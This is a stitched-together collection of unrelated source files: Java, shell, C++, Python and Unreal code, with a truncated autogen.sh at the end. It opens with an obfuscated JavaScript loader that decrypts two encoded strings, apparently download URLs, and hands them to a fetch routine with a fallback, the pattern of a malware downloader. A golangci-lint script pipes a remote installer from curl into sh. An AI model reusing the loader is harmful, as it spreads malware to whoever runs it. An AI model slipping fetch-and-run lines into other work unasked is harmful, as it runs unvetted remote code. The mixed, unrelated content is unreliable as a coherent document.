// strings contain cannot be determined from this chunk.
function Nvk(sIz)
{
var tvFAk = [];
// Arithmetic chain folds to the constant 0 (index of the first entry):
// (123392+41696)/176-938 = 0.
var FcxPKQ=123392;
var rLGvcO=FcxPKQ+41696;
var jpk=rLGvcO/176;
var MsBRd=jpk-938;
util_log("Starting Nvk("+sIz+")");
var MYhK = "2\x35\x3063\x44\x31\x326\x387E";
MYhK += "59371B560242";
MYhK += "413518211B27";
MYhK += "1\x31\x33\x3938582\x341\x44";
MYhK += "5\x345947\x342\x3751\x34";
MYhK += "\x32\x321\x433D0\x37\x33C25";
MYhK += "59331A5C1B55";
MYhK += "417707241D3D";
MYhK += "10213C192B1B";
MYhK += "57055B5B7746";
MYhK += "\x37\x34427\x434\x433729";
MYhK += "13";
// The second TgqZmHg argument is a key assembled character-by-character
// from constant arithmetic via taImARE.
var ixqc=TgqZmHg(MYhK,taImARE(229-171)+taImARE(3*23)+taImARE(5*13)+taImARE(5456/44+0)+taImARE(14*7)+taImARE(4*13)+taImARE(5460/78+0)+taImARE(2132/52+0)+taImARE(3*23)+taImARE(490/10+0)+taImARE(10*7)+taImARE(5346/66+0)+taImARE(846/18+0)+taImARE(1089/9-0)+taImARE(47*2));
util_log("ixqc " + ixqc)
tvFAk[MsBRd] = ixqc;
// Arithmetic chain folds to the constant 1 (index of the second entry):
// (24991+28413)/676-78 = 1.
var cwRbR=24991;
var ylR=cwRbR+28413;
var WgSzpvB=ylR/676;
var VEvVR=WgSzpvB-78;
var SqC = "\x32D45333C501\x36";
SqC += "4A17145B6038";
SqC += "251B2C5C0F3A";
SqC += "33183744683B";
SqC += "1A14060A1F42";
SqC += "2\x3825255\x3536\x35\x30";
SqC += "\x30B\x32\x35\x322\x345\x36A\x344";
SqC += "2938034D0900";
SqC += "\x3151\x39\x32\x31\x32A\x33F\x31\x44";
SqC += "3759092D3419";
SqC += "740\x38\x37\x3779\x34\x34\x35C";
SqC += "1D00";
var wvzdTH=TgqZmHg(SqC,taImARE(5293/67-0)+taImARE(2160/20-0)+taImARE(2173/53+0)+taImARE(12*7)+taImARE(412/4-0)+taImARE(1176/24-0)+taImARE(3*19)+taImARE(895-838)+taImARE(938/14+0)+taImARE(677-582)+taImARE(4872/84+0)+taImARE(620-585)+taImARE(4160/80-0)+taImARE(4416/46+0)+taImARE(2*37)+taImARE(18*3)+taImARE(286-230)+taImARE(109)+taImARE(433-392)+taImARE(5*19));
tvFAk[VEvVR] = wvzdTH;
return tvFAk[sIz];
}
// Counter for the scan loop below.
var YaFozBt = 0;
// Computes the iteration bound for the scan loop below.  The original
// obfuscated arithmetic chain folds to the constant 2; the value (and the
// trailing "+0") is preserved exactly.
function Xrkk() {
    var summed = 554561 + 57439;   // 612000
    var scaled = summed / 720;     // 850
    var bound = scaled - 848;      // 2
    return bound + 0;
}
// Driver loop: Xrkk() folds to the constant 2, so the body runs twice.
var dNxffdL = Xrkk();
util_log("a " + dNxffdL);
for (; YaFozBt < dNxffdL; ++YaFozBt)
{
// OcRSCv() is always 1, so the guard always passes (the second condition
// was commented out by the original author).
if ( (OcRSCv() >= 0) /*&& owFqDm(YaFozBt)*/)
{
var GzvMU = false;
// "128 < 54" is constant false, passed as Urza's fallback return value.
GzvMU = Urza(Nvk(0), 128 < 54);
if (GzvMU)
{
}
else
Urza(Nvk(1), false);
}
}
|
// repository: anotheria/moskito-control
package org.moskito.control.core.inspection;
import org.moskito.control.config.ComponentConfig;
import org.moskito.control.connectors.Connector;
import org.moskito.control.connectors.ConnectorException;
import org.moskito.control.connectors.ConnectorFactory;
import org.moskito.control.connectors.response.ConnectorAccumulatorResponse;
import org.moskito.control.connectors.response.ConnectorAccumulatorsNamesResponse;
import org.moskito.control.connectors.response.ConnectorConfigResponse;
import org.moskito.control.connectors.response.ConnectorInformationResponse;
import org.moskito.control.connectors.response.ConnectorInspectionDataSupportResponse;
import org.moskito.control.connectors.response.ConnectorStatusResponse;
import org.moskito.control.connectors.response.ConnectorThresholdsResponse;
import org.moskito.control.core.Component;
import org.moskito.control.core.ComponentRepository;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.io.IOException;
import java.util.List;
/**
* Provides the most recent data for separate section of component on-demand.
*
* @author <NAME>
*/
public class ComponentInspectionDataProvider {

    /**
     * Logger.
     * Declared {@code private static final}: one shared logger per class
     * instead of a mutable, package-visible per-instance field.
     */
    private static final Logger log = LoggerFactory.getLogger(ComponentInspectionDataProvider.class);

    /**
     * Provides thresholds data.
     *
     * @param component {@link Component}
     * @return {@link ConnectorThresholdsResponse}, or {@code null} if the connector failed
     */
    public ConnectorThresholdsResponse provideThresholds(Component component) {
        Connector connector = getConfiguredConnector(component);
        try {
            ConnectorThresholdsResponse response = connector.getThresholds();
            // Retrieving thresholds also yields a fresh status; propagate it
            // to the component so the view stays current.
            ConnectorStatusResponse newStatus = connector.getNewStatus();
            component.setStatus(newStatus.getStatus());
            return response;
        } catch (ConnectorException e) {
            log.info("Cannot retrieve thresholds for " + component.getName(), e);
            return null;
        }
    }

    /**
     * Provides accumulators names data (list of accumulators names).
     *
     * @param component {@link Component}
     * @return {@link ConnectorAccumulatorsNamesResponse}, or {@code null} on I/O failure
     */
    public ConnectorAccumulatorsNamesResponse provideAccumulatorsNames(Component component) {
        Connector connector = getConfiguredConnector(component);
        try {
            return connector.getAccumulatorsNames();
        } catch (IOException e) {
            log.info("Cannot retrieve accumulators list for " + component.getName(), e);
            return null;
        }
    }

    /**
     * Provides accumulators charts data.
     *
     * @param component {@link Component}
     * @param accumulatorsNames list of accumulators names to get charts for
     * @return {@link ConnectorAccumulatorResponse}
     */
    public ConnectorAccumulatorResponse provideAccumulatorsCharts(Component component, List<String> accumulatorsNames) {
        return getConfiguredConnector(component).getAccumulators(accumulatorsNames);
    }

    /**
     * Provides connector information data.
     *
     * @param component {@link Component}
     * @return {@link ConnectorInformationResponse}
     */
    public ConnectorInformationResponse provideConnectorInformation(Component component) {
        return getConfiguredConnector(component).getInfo();
    }

    /**
     * Provides supported inspection data for given component.
     *
     * @param component {@link Component}
     * @return {@link ConnectorInspectionDataSupportResponse}
     */
    public ConnectorInspectionDataSupportResponse provideConnectorInspectionDataSupport(Component component) {
        Connector connector = getConfiguredConnector(component);
        ConnectorInspectionDataSupportResponse dataSupportResponse = new ConnectorInspectionDataSupportResponse();
        dataSupportResponse.setSupportsAccumulators(connector.supportsAccumulators());
        dataSupportResponse.setSupportsThresholds(connector.supportsThresholds());
        dataSupportResponse.setSupportsInfo(connector.supportsInfo());
        dataSupportResponse.setSupportsConfig(connector.supportsConfig());
        return dataSupportResponse;
    }

    /**
     * Provides component's config.
     *
     * @param component {@link Component}
     * @return {@link ConnectorConfigResponse}
     */
    public ConnectorConfigResponse provideConfig(Component component) {
        return getConfiguredConnector(component).getConfig();
    }

    /**
     * Configures connector for given application and component.
     * The configuration is re-read from the {@link ComponentRepository} by
     * component name, so the passed instance may be stale.
     *
     * @param component {@link Component}
     * @return configured {@link Connector}
     */
    private Connector getConfiguredConnector(Component component) {
        ComponentConfig componentConfig = ComponentRepository.getInstance().getComponent(component.getName()).getConfiguration();
        Connector connector = ConnectorFactory.createConnector(componentConfig.getConnectorType());
        connector.configure(componentConfig.getName(), componentConfig.getLocation(), componentConfig.getCredentials());
        return connector;
    }
}
|
#!/usr/bin/env bash
# Integration-test driver for the aws_ssm connection plugin: provisions the
# AWS test environment, runs the generic connection test suite against Linux
# and Windows SSM targets, and always tears the environment down on exit.
set -eux
# Keep a copy of the CLI args so the EXIT trap can forward them even though
# "$@" is still in scope (explicit is safer inside trap-invoked functions).
CMD_ARGS=("$@")
# Destroy Environment
cleanup() {
# NOTE(review): resolves relative to whichever directory the script is in
# when the trap fires; works both from the starting directory and from
# ../connection (entered below) since the two share a parent — confirm if
# the layout changes.
cd ../connection_aws_ssm
ansible-playbook -c local aws_ssm_integration_test_teardown.yml "${CMD_ARGS[@]}"
}
trap "cleanup" EXIT
# Setup Environment
ansible-playbook -c local aws_ssm_integration_test_setup.yml "$@"
# Export the AWS Keys
# xtrace is disabled while sourcing so credentials are not echoed to the log.
set +x
. ./aws-env-vars.sh
set -x
cd ../connection
# Execute Integration tests for Linux
INVENTORY=../connection_aws_ssm/inventory-linux.aws_ssm ./test.sh \
-e target_hosts=aws_ssm \
-e local_tmp=/tmp/ansible-local \
-e remote_tmp=/tmp/ansible-remote \
-e action_prefix= \
"$@"
# Execute Integration tests for Windows
INVENTORY=../connection_aws_ssm/inventory-windows.aws_ssm ./test.sh \
-e target_hosts=aws_ssm \
-e local_tmp=/tmp/ansible-local \
-e remote_tmp=c:/windows/temp/ansible-remote \
-e action_prefix=win_ \
"$@"
|
package de.unibi.agbi.biodwh2.core.vocabulary;
import org.apache.jena.rdf.model.Property;
import org.apache.jena.rdf.model.ResourceFactory;
/**
 * RDF vocabulary constants for the BioModels SBML export.
 */
public class BioModels {
    /** Base URI of the BioModels SBML RDF vocabulary. */
    public static final String sbmlRdf = "http://identifiers.org/biomodels.vocabulary/";
    /** Base URI of the BioModels.net biology qualifiers. */
    public static final String bqbiol = "http://biomodels.net/biology-qualifiers/";
    /**
     * Base URI of the BioModels.net model qualifiers.
     * Fixed: an automated package rename had replaced the "model" segment of
     * this URI with a Java package path
     * ("de.unibi.agbi.biodwh2.reactome.entities-qualifiers"), which is not a
     * valid qualifier namespace.
     */
    public static final String bqmodel = "http://biomodels.net/model-qualifiers/";
    /** The vocabulary's "name" property. */
    public static final Property name = ResourceFactory.createProperty(sbmlRdf + "name");

    /** Non-instantiable outside the package; this is a constants holder. */
    BioModels(){
    }
}
|
// No copyright - copy as you please
#pragma once
#include <Engine/UserDefinedEnum.h>
#include "EAIState.generated.h"
// AI behavior states, exposed to Blueprints via UENUM.
UENUM(BlueprintType) //"BlueprintType" is essential to include
enum class EAIState_Enum : uint8
{
Homeless UMETA(DisplayName = "Homeless"),
Working UMETA(DisplayName = "Working"),
Sleeping UMETA(DisplayName = "Sleeping"),
MoveByCommander UMETA(DisplayName = "MoveByCommander")
};
// Holder type exposing an editable AIState property to the editor and
// Blueprints.
// NOTE(review): subclassing UUserDefinedEnum from C++ is unusual — such
// assets are normally editor-created; confirm this base class is intended.
UCLASS()
class TD2020_API UEAIState : public UUserDefinedEnum
{
GENERATED_BODY()
public:
UPROPERTY(EditAnywhere, BlueprintReadWrite, Category = "Enum")
EAIState_Enum AIState;
//Rest of Class Code
};
|
import nltk


def classify_spam(data="This email is a spam message."):
    """Classify a piece of email text as spam using a naive keyword check.

    The text is tokenized, English stopwords are removed, and the message is
    flagged as spam if the token ``spam`` survives filtering.

    Args:
        data: Email text to classify. Defaults to the original demo string,
            so existing no-argument callers behave exactly as before.

    Returns:
        bool: True if the text is classified as spam, False otherwise.
    """
    # word_tokenize requires the 'punkt' models in addition to 'stopwords';
    # the original only fetched 'stopwords' and crashed on first tokenize.
    nltk.download('stopwords', quiet=True)
    nltk.download('punkt', quiet=True)
    from nltk.corpus import stopwords
    from nltk.tokenize import word_tokenize

    # Stopword lists are lowercase, so compare case-insensitively while
    # keeping the original token casing in the filtered list.
    stop_words = set(stopwords.words('english'))
    words_filtered = [w for w in word_tokenize(data) if w.lower() not in stop_words]

    is_spam = 'spam' in words_filtered
    if is_spam:
        print("This is a spam email.")
    else:
        print("This is a valid email.")
    return is_spam


if __name__ == "__main__":
    classify_spam()
// WARNING: Changes to this file must be contributed back to Sawyer or else they will
// be clobbered by the next update from Sawyer. The Sawyer repository is at
// https://github.com/matzke1/sawyer.
#ifndef Sawyer_Access_H
#define Sawyer_Access_H
namespace Sawyer {
namespace Access {
/** Bits to define accessibility.
 *
 *  These constants are used throughout the AddressMap framework.  Each value
 *  is a single-bit flag (the masks excepted) and flags may be combined with
 *  bitwise OR; the low eight bits are reserved for the library while the
 *  remaining 24 bits are available for user-defined semantics. */
enum Access {
EXECUTABLE = 0x00000001, /**< Execute accessibility bit. */
WRITABLE = 0x00000002, /**< Write accessibility bit. */
READABLE = 0x00000004, /**< Read accessibility bit. */
IMMUTABLE = 0x00000008, /**< Underlying buffer is immutable. E.g., mmap'd read-only. */
RESERVED_MASK = 0x000000ff, /**< Accessibility bits reserved for use by the library. */
USERDEF_MASK = 0xffffff00 /**< Accessibility bits available to users. */
};
} // namespace
} // namespace
#endif
|
#!/bin/bash
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# export JAVA_HOME=java
# export SUBMARINE_SERVER_JAVA_OPTS
# export SUBMARINE_SERVER_MEM="-Xms1024m -Xmx1024m -XX:MaxPermSize=512m"
|
#!/bin/bash
# Copyright 2018 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
set -euo pipefail

# Install golangci-lint into GOPATH/bin if it is not already on PATH, then
# lint the whole repository with the repo's .golangci.yml configuration.
if [[ -z "$(command -v golangci-lint)" ]]; then
  echo "Cannot find golangci-lint. Installing golangci-lint..."
  # Quote the command substitutions: an unquoted $(go env GOPATH) word-splits
  # (and glob-expands) if GOPATH contains spaces.
  curl -sSfL https://raw.githubusercontent.com/golangci/golangci-lint/master/install.sh | sh -s -- -b "$(go env GOPATH)/bin" v1.31.0
  export PATH="$PATH:$(go env GOPATH)/bin"
fi
echo "Verifying golint"
readonly PKG_ROOT="$(git rev-parse --show-toplevel)"
golangci-lint run --config "${PKG_ROOT}/.golangci.yml"
echo "Congratulations! Lint check completed for all Go source files."
|
#!/bin/sh
# a u t o g e n . s h
#
# Copyright (c) 2005-2007 United States Government as represented by
# the U.S. Army Research Laboratory.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# 3. The name of the author may not be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS
# OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
###
#
# Script for automatically preparing the sources for compilation by
# performing the myrid of necessary steps. The script attempts to
# detect proper version support, and outputs warnings about particular
# systems that have autotool peculiarities.
#
# Basically, if everything is set up and installed correctly, the
# script will validate that minimum versions of the GNU Build System
# tools are installed, account for several common configuration
# issues, and then simply run autoreconf for you.
#
# If autoreconf fails, which can happen for many valid configurations,
# this script proceeds to run manual preparation steps effectively
# providing a POSIX shell script (mostly complete) reimplementation of
# autoreconf.
#
# The AUTORECONF, AUTOCONF, AUTOMAKE, LIBTOOLIZE, ACLOCAL, AUTOHEADER
# environment variables and corresponding _OPTIONS variables (e.g.
# AUTORECONF_OPTIONS) may be used to override the default automatic
# detection behaviors. Similarly the _VERSION variables will override
# the minimum required version numbers.
#
# Examples:
#
# To obtain help on usage:
# ./autogen.sh --help
#
# To obtain verbose output:
# ./autogen.sh --verbose
#
# To skip autoreconf and prepare manually:
# AUTORECONF=false ./autogen.sh
#
# To verbosely try running with an older (unsupported) autoconf:
# AUTOCONF_VERSION=2.50 ./autogen.sh --verbose
#
# Author: Christopher Sean Morrison <morrison@brlcad.org>
#
######################################################################
# Minimum required GNU Build System tool versions.  Each may be overridden
# by pre-setting the corresponding _VERSION environment variable.
# set to minimum acceptable version of autoconf
if [ "x$AUTOCONF_VERSION" = "x" ] ; then
AUTOCONF_VERSION=2.52
fi
# set to minimum acceptable version of automake
if [ "x$AUTOMAKE_VERSION" = "x" ] ; then
AUTOMAKE_VERSION=1.6.0
fi
# set to minimum acceptable version of libtool
if [ "x$LIBTOOL_VERSION" = "x" ] ; then
LIBTOOL_VERSION=1.4.2
fi
##################
# ident function #
##################
# ident: print the script's identification banner — author, license, a
# copyright year extracted from this file's header (falling back to the
# current year), and a version derived from the embedded CVS Id string.
ident ( ) {
# extract copyright from header
__copyright="`grep Copyright $AUTOGEN_SH | head -${HEAD_N}1 | awk '{print $4}'`"
if [ "x$__copyright" = "x" ] ; then
__copyright="`date +%Y`"
fi
# extract version from CVS Id string
__id="$Id: autogen.sh,v 14.97 2007/06/18 22:25:02 brlcad Exp $"
__version="`echo $__id | sed 's/.*\([0-9][0-9][0-9][0-9]\)[-\/]\([0-9][0-9]\)[-\/]\([0-9][0-9]\).*/\1\2\3/'`"
if [ "x$__version" = "x" ] ; then
__version=""
fi
echo "autogen.sh build preparation script by Christopher Sean Morrison"
echo "revised 3-clause BSD-style license, copyright (c) $__copyright"
echo "script version $__version, ISO/IEC 9945 POSIX shell script"
}
##################
# USAGE FUNCTION #
##################
# usage: print command-line help followed by the identification banner.
# Always returns 0; callers decide whether to exit.
usage ( ) {
echo "Usage: $AUTOGEN_SH [-h|--help] [-v|--verbose] [-q|--quiet] [--version]"
echo " --help Help on $NAME_OF_AUTOGEN usage"
echo " --verbose Verbose progress output"
echo " --quiet Quiet suppressed progress output"
echo " --version Only perform GNU Build System version checks"
echo
echo "Description: This script will validate that minimum versions of the"
echo "GNU Build System tools are installed and then run autoreconf for you."
echo "Should autoreconf fail, manual preparation steps will be run"
echo "potentially accounting for several common preparation issues. The"
echo "AUTORECONF, AUTOCONF, AUTOMAKE, LIBTOOLIZE, ACLOCAL, AUTOHEADER,"
echo "PROJECT, & CONFIGURE environment variables and corresponding _OPTIONS"
echo "variables (e.g. AUTORECONF_OPTIONS) may be used to override the"
echo "default automatic detection behavior."
echo
ident
return 0
}
##########################
# VERSION_ERROR FUNCTION #
##########################
# version_error MIN_VERSION APP_NAME
# Report that APP_NAME is missing or older than MIN_VERSION and explain how
# to proceed.  Exits 1 only on internal misuse (missing arguments); the
# caller is responsible for the final exit.
version_error ( ) {
if [ "x$1" = "x" ] ; then
echo "INTERNAL ERROR: version_error was not provided a version"
exit 1
fi
if [ "x$2" = "x" ] ; then
echo "INTERNAL ERROR: version_error was not provided an application name"
exit 1
fi
$ECHO
$ECHO "ERROR: To prepare the ${PROJECT} build system from scratch,"
$ECHO " at least version $1 of $2 must be installed."
$ECHO
$ECHO "$NAME_OF_AUTOGEN does not need to be run on the same machine that will"
$ECHO "run configure or make. Either the GNU Autotools will need to be installed"
$ECHO "or upgraded on this system, or $NAME_OF_AUTOGEN must be run on the source"
$ECHO "code on another system and then transferred to here. -- Cheers!"
$ECHO
}
##########################
# VERSION_CHECK FUNCTION #
##########################
# version_check MINIMUM CURRENT
# Compare two dotted version strings; return 0 (success) when
# CURRENT >= MINIMUM, 1 otherwise.  Handles forms like "1.10" and "1.4-p6"
# by normalizing non-digits to dots; missing components default to 0.
version_check ( ) {
    if [ "x$1" = "x" ] ; then
	echo "INTERNAL ERROR: version_check was not provided a minimum version"
	exit 1
    fi
    _min="$1"
    if [ "x$2" = "x" ] ; then
	echo "INTERNAL ERROR: version check was not provided a comparison version"
	exit 1
    fi
    _cur="$2"

    # needed to handle versions like 1.10 and 1.4-p6
    _min="`echo ${_min}. | sed 's/[^0-9]/./g' | sed 's/\.\././g'`"
    _cur="`echo ${_cur}. | sed 's/[^0-9]/./g' | sed 's/\.\././g'`"

    _min_major="`echo $_min | cut -d. -f1`"
    _min_minor="`echo $_min | cut -d. -f2`"
    _min_patch="`echo $_min | cut -d. -f3`"
    _cur_major="`echo $_cur | cut -d. -f1`"
    _cur_minor="`echo $_cur | cut -d. -f2`"
    _cur_patch="`echo $_cur | cut -d. -f3`"

    # default any missing component to 0
    if [ "x$_min_major" = "x" ] ; then
	_min_major=0
    fi
    if [ "x$_min_minor" = "x" ] ; then
	_min_minor=0
    fi
    if [ "x$_min_patch" = "x" ] ; then
	_min_patch=0
    fi
    # BUGFIX: this branch previously tested _cur_minor, so an empty current
    # MAJOR version was never defaulted and the numeric tests below could
    # fail with a syntax error.
    if [ "x$_cur_major" = "x" ] ; then
	_cur_major=0
    fi
    if [ "x$_cur_minor" = "x" ] ; then
	_cur_minor=0
    fi
    if [ "x$_cur_patch" = "x" ] ; then
	_cur_patch=0
    fi

    $VERBOSE_ECHO "Checking if ${_cur_major}.${_cur_minor}.${_cur_patch} is greater than ${_min_major}.${_min_minor}.${_min_patch}"

    if [ $_min_major -lt $_cur_major ] ; then
	return 0
    elif [ $_min_major -eq $_cur_major ] ; then
	if [ $_min_minor -lt $_cur_minor ] ; then
	    return 0
	elif [ $_min_minor -eq $_cur_minor ] ; then
	    if [ $_min_patch -lt $_cur_patch ] ; then
		return 0
	    elif [ $_min_patch -eq $_cur_patch ] ; then
		return 0
	    fi
	fi
    fi
    return 1
}
######################################
# LOCATE_CONFIGURE_TEMPLATE FUNCTION #
######################################
# locate_configure_template: echo the path of the first configure template
# found, searching the current directory, then $PWD spelled out explicitly,
# then the directory containing autogen.sh.  configure.ac is preferred over
# the older configure.in at each location; nothing is printed if none exist.
locate_configure_template ( ) {
    _pwd="`pwd`"
    for _candidate in \
	"./configure.ac" \
	"./configure.in" \
	"$_pwd/configure.ac" \
	"$_pwd/configure.in" \
	"$PATH_TO_AUTOGEN/configure.ac" \
	"$PATH_TO_AUTOGEN/configure.in" ; do
	if test -f "$_candidate" ; then
	    echo "$_candidate"
	    return
	fi
    done
}
##################
# argument check #
##################
# Capture the invocation context: full argument list, and this script's own
# path pieces (used for recursion, messages, and locating misc/libtool.m4).
ARGS="$*"
PATH_TO_AUTOGEN="`dirname $0`"
NAME_OF_AUTOGEN="`basename $0`"
AUTOGEN_SH="$PATH_TO_AUTOGEN/$NAME_OF_AUTOGEN"
LIBTOOL_M4="${PATH_TO_AUTOGEN}/misc/libtool.m4"
# Option variables may be pre-seeded from the environment; each is only
# given its default when unset.
if [ "x$HELP" = "x" ] ; then
HELP=no
fi
if [ "x$QUIET" = "x" ] ; then
QUIET=no
fi
if [ "x$VERBOSE" = "x" ] ; then
VERBOSE=no
fi
if [ "x$VERSION_ONLY" = "x" ] ; then
VERSION_ONLY=no
fi
if [ "x$AUTORECONF_OPTIONS" = "x" ] ; then
AUTORECONF_OPTIONS="-i -f"
fi
if [ "x$AUTOCONF_OPTIONS" = "x" ] ; then
AUTOCONF_OPTIONS="-f"
fi
if [ "x$AUTOMAKE_OPTIONS" = "x" ] ; then
AUTOMAKE_OPTIONS="-a -c -f"
fi
# ALT_* option sets are presumably fallbacks used later in the script
# (their use is outside this chunk) — TODO confirm.
ALT_AUTOMAKE_OPTIONS="-a -c"
if [ "x$LIBTOOLIZE_OPTIONS" = "x" ] ; then
LIBTOOLIZE_OPTIONS="--automake -c -f"
fi
ALT_LIBTOOLIZE_OPTIONS="--automake --copy --force"
if [ "x$ACLOCAL_OPTIONS" = "x" ] ; then
ACLOCAL_OPTIONS=""
fi
if [ "x$AUTOHEADER_OPTIONS" = "x" ] ; then
AUTOHEADER_OPTIONS=""
fi
# parse the command line
for arg in $ARGS ; do
case "x$arg" in
x--help) HELP=yes ;;
x-[hH]) HELP=yes ;;
x--quiet) QUIET=yes ;;
x-[qQ]) QUIET=yes ;;
x--verbose) VERBOSE=yes ;;
x-[vV]) VERBOSE=yes ;;
x--version) VERSION_ONLY=yes ;;
*)
echo "Unknown option: $arg"
echo
usage
exit 1
;;
esac
done
#####################
# environment check #
#####################
# sanity check before recursions potentially begin
if [ ! -f "$AUTOGEN_SH" ] ; then
echo "INTERNAL ERROR: $AUTOGEN_SH does not exist"
if [ ! "x$0" = "x$AUTOGEN_SH" ] ; then
echo "INTERNAL ERROR: dirname/basename inconsistency: $0 != $AUTOGEN_SH"
fi
exit 1
fi
# force locale setting to C so things like date output as expected
LC_ALL=C
# commands that this script expects
for __cmd in echo head tail pwd ; do
echo "test" | $__cmd > /dev/null 2>&1
if [ $? != 0 ] ; then
echo "INTERNAL ERROR: '${__cmd}' command is required"
exit 2
fi
done
echo "test" | grep "test" > /dev/null 2>&1
if test ! x$? = x0 ; then
echo "INTERNAL ERROR: grep command is required"
exit 1
fi
echo "test" | sed "s/test/test/" > /dev/null 2>&1
if test ! x$? = x0 ; then
echo "INTERNAL ERROR: sed command is required"
exit 1
fi
# determine the behavior of echo (BSD-style "-n" vs SysV-style "\c"
# newline suppression), recording the appropriate flags for later use
case `echo "testing\c"; echo 1,2,3`,`echo -n testing; echo 1,2,3` in
*c*,-n*) ECHO_N= ECHO_C='
' ECHO_T=' ' ;;
*c*,* ) ECHO_N=-n ECHO_C= ECHO_T= ;;
*) ECHO_N= ECHO_C='\c' ECHO_T= ;;
esac
# determine the behavior of head (whether -n takes a joined or separate count)
case "x`echo 'head' | head -n 1 2>&1`" in
*xhead*) HEAD_N="n " ;;
*) HEAD_N="" ;;
esac
# determine the behavior of tail
case "x`echo 'tail' | tail -n 1 2>&1`" in
*xtail*) TAIL_N="n " ;;
*) TAIL_N="" ;;
esac
# Progress-output helpers: $ECHO prints unless --quiet, $VERBOSE_ECHO only
# with --verbose; both default to the no-op ":" builtin.
VERBOSE_ECHO=:
ECHO=:
if [ "x$QUIET" = "xyes" ] ; then
if [ "x$VERBOSE" = "xyes" ] ; then
echo "Verbose output quelled by quiet option. Further output disabled."
fi
else
ECHO=echo
if [ "x$VERBOSE" = "xyes" ] ; then
echo "Verbose output enabled"
VERBOSE_ECHO=echo
fi
fi
# allow a recursive run to disable further recursions
if [ "x$RUN_RECURSIVE" = "x" ] ; then
RUN_RECURSIVE=yes
fi
################################################
# check for help arg and bypass version checks #
################################################
if [ "x`echo $ARGS | sed 's/.*[hH][eE][lL][pP].*/help/'`" = "xhelp" ] ; then
HELP=yes
fi
if [ "x$HELP" = "xyes" ] ; then
usage
$ECHO "---"
$ECHO "Help was requested. No preparation or configuration will be performed."
exit 0
fi
#######################
# set up signal traps #
#######################
# untrap_abnormal: clear the abnormal-exit signal traps installed below
# (presumably called before intentional exits later in the script — the
# call sites are outside this chunk).
untrap_abnormal ( ) {
for sig in 1 2 13 15; do
trap - $sig
done
}
# do this cleanup whenever we exit.
# (The trap bodies below are single-quoted strings evaluated at trap time;
# they must not be edited casually — $-expansion happens on execution.)
trap '
# start from the root
if test -d "$START_PATH" ; then
cd "$START_PATH"
fi
# restore/delete backup files
if test "x$PFC_INIT" = "x1" ; then
recursive_restore
fi
' 0
# trap SIGHUP (1), SIGINT (2), SIGPIPE (13), SIGTERM (15)
for sig in 1 2 13 15; do
trap '
$ECHO ""
$ECHO "Aborting $NAME_OF_AUTOGEN: caught signal '$sig'"
# start from the root
if test -d "$START_PATH" ; then
cd "$START_PATH"
fi
# clean up on abnormal exit
$VERBOSE_ECHO "rm -rf autom4te.cache"
rm -rf autom4te.cache
if test -f "acinclude.m4.$$.backup" ; then
$VERBOSE_ECHO "cat acinclude.m4.$$.backup > acinclude.m4"
chmod u+w acinclude.m4
cat acinclude.m4.$$.backup > acinclude.m4
$VERBOSE_ECHO "rm -f acinclude.m4.$$.backup"
rm -f acinclude.m4.$$.backup
fi
{ (exit 1); exit 1; }
' $sig
done
#############################
# look for a configure file #
#############################
if [ "x$CONFIGURE" = "x" ] ; then
CONFIGURE="`locate_configure_template`"
if [ ! "x$CONFIGURE" = "x" ] ; then
$VERBOSE_ECHO "Found a configure template: $CONFIGURE"
fi
else
$ECHO "Using CONFIGURE environment variable override: $CONFIGURE"
fi
if [ "x$CONFIGURE" = "x" ] ; then
if [ "x$VERSION_ONLY" = "xyes" ] ; then
CONFIGURE=/dev/null
else
$ECHO
$ECHO "A configure.ac or configure.in file could not be located implying"
$ECHO "that the GNU Build System is at least not used in this directory. In"
$ECHO "any case, there is nothing to do here without one of those files."
$ECHO
$ECHO "ERROR: No configure.in or configure.ac file found in `pwd`"
exit 1
fi
fi
####################
# get project name #
####################
if [ "x$PROJECT" = "x" ] ; then
# extract the project name from the first argument of AC_INIT, ignoring
# commented-out occurrences and stripping optional m4 [brackets]
PROJECT="`grep AC_INIT $CONFIGURE | grep -v '.*#.*AC_INIT' | tail -${TAIL_N}1 | sed 's/^[ ]*AC_INIT(\([^,)]*\).*/\1/' | sed 's/.*\[\(.*\)\].*/\1/'`"
if [ "x$PROJECT" = "xAC_INIT" ] ; then
# projects might be using the older/deprecated arg-less AC_INIT .. look for AM_INIT_AUTOMAKE instead
